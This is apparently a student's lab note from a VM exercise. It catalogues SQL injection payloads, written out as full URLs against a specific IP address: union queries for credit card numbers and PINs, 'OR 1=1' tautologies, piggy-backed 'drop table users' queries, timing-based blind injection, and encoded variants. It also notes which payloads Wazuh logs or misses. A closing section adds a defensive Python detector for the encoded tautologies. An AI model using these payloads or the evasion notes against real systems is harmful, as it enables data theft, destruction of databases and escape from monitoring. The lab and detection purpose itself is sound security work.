# 5. SQL Commands

###### tags: `VM workflow`

```
genre_1 = 7
genre_2 = 5
genre_3 = 11
genre_4 = 15
genre_5 = 6+7
genre_6 = 9
```

## Attack type 1 - Union Query

http://140.122.184.28/index.php?NewsID=1 union select ==CreditcardNo==, ==Pinno== from ==Creditcardtable==

## Attack type 2 - Tautologies

```
http://140.122.184.28/users/?id=SELECT+*+FROM+users where username = 'admin' --
```

Use the one below (v1):

```
http://140.122.184.28/users/?user_id=SELECT * FROM USERS WHERE USER_NAME ='ADMINISTRATOR' and PASSWORD = " OR 1=1 --
```

v2:

http://140.122.184.28/users/?user_id=SELECT * FROM USERS WHERE username ='admin' and password = " OR ==1=1== --

## Attack type 3 - Piggy-Backed Queries

Use the first one:

http://140.122.184.28/users/?category=pets ; drop table ==users==-- ' and type = 'public'

```
http://140.122.184.28/users/?id=SELECT+*+FROM+news where year='2013' and author=''; drop table users-- ' and type = 'public'
```

## Attack type 4 - Illegal/Logically Incorrect Queries

## Attack type 5 - Stored Procedures

## Attack type 6 - Inference

Use blind injections.

Timing attack (not detected by Wazuh):

```
http://140.122.184.28/index.php?NewsID=1 and if (version() like '8%', sleep(3), 'false')
```

After running the attack above, the page keeps loading (spinner) for 3 seconds. The `sleep` parameter can be changed as needed:

```
http://140.122.184.28/index.php?NewsID=1 and if (version() like '8%', sleep(10), 'false')
```

Blind injection:

http://140.122.184.28/news.php?NewsID=1 AND (select 1 from ==Creditcardtable== limit 0,1)=1

## Attack type 7 - Alternate Encodings

Use the two that are logged.

```
Logged
http://140.122.184.28/users/?id=SELECT * FROM TABLE_USERS WHERE USERNAME = 'admin' and PASS = " %31%20%4F%52%20%31%3D%31 --

Not logged
http://140.122.184.28/users/?id=SELECT * FROM TABLE_USERS WHERE USERNAME = 'admin' and PASS = " 1 OR 1=&#x 31 --

Not logged
http://140.122.184.28/users/?id=SELECT * FROM TABLE_USERS WHERE USERNAME = 'admin' and PASS = " &#49&#32&#79&#82&#32&#49&#61&#49 --

Logged
http://140.122.184.28/users/?id=SELECT * FROM TABLE_USERS WHERE USERNAME = 'admin' and PASS = " MSBPUiAxPTE= --
```

## Attack type 8 - Comment

```
http://140.122.184.28/users/?id=SELECT+*+FROM+news where year='2013' ;
dr/*comment*/op table users-- ' and type = 'public'
```
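Added example (not part of the original note): a small detector, written from the defender's side, that canonicalises a query string before matching a tautology. It decodes URL-encoding, HTML numeric entities (including the spaced `&#x 31` form, which `html.unescape` would not handle) and base64 tokens, which is exactly why the "Not logged" variants in the Alternate Encodings section evade a matcher that only inspects the raw string. The `SAMPLES` are constructed variants of that section's payloads with the host omitted; the regexes are assumptions, not Wazuh's rules.

```python
import base64
import re
from urllib.parse import unquote_plus

# Tautology: OR followed by "<x> = <x>" with both sides identical (e.g. 1=1 or 'a'='a').
TAUTOLOGY = re.compile(r"\bOR\s+(\w+|'[^']*')\s*=\s*\1(?!\w)", re.IGNORECASE)
# HTML numeric entities; tolerant of a missing ';' and of "&#x 31"-style spacing.
ENTITY = re.compile(r"&#([xX]\s*[0-9a-fA-F]+|[0-9]+);?")
# Candidate base64 tokens: 8+ alphabet characters with optional padding.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{8,}={0,2}")

def _entity(m):
    body = m.group(1).replace(" ", "")
    return chr(int(body[1:], 16) if body[0] in "xX" else int(body))

def _expand_base64(text):
    """Append the decoded form of every token that is valid base64 for printable ASCII."""
    extra = []
    for tok in B64_TOKEN.findall(text):
        try:
            decoded = base64.b64decode(tok, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):  # not base64, bad length, or not ASCII
            continue
        if decoded.isprintable():
            extra.append(decoded)
    return text + " " + " ".join(extra) if extra else text

def normalize(raw):
    """Canonicalise before matching: %XX and '+' first, then entities, then base64."""
    text = unquote_plus(raw)
    text = ENTITY.sub(_entity, text)
    return _expand_base64(text)

def is_tautology(raw):
    return TAUTOLOGY.search(normalize(raw)) is not None

def scan(samples):
    return {name: is_tautology(raw) for name, raw in samples.items()}

# Constructed variants of the four encodings listed in the Alternate Encodings section.
SAMPLES = {
    "url_encoded": "id=SELECT * FROM TABLE_USERS WHERE USERNAME='admin' and PASS='' %31%20%4F%52%20%31%3D%31 --",
    "hex_entity": "id=SELECT * FROM TABLE_USERS WHERE USERNAME='admin' and PASS='' 1 OR 1=&#x 31 --",
    "dec_entity": "id=SELECT * FROM TABLE_USERS WHERE USERNAME='admin' and PASS='' &#49&#32&#79&#82&#32&#49&#61&#49 --",
    "base64": "id=SELECT * FROM TABLE_USERS WHERE USERNAME='admin' and PASS='' MSBPUiAxPTE= --",
    "benign": "id=42&sort=name",
}
```

Running `scan(SAMPLES)` flags all four encoded variants and leaves the benign query alone; without the `normalize` step only the plain-text form would match.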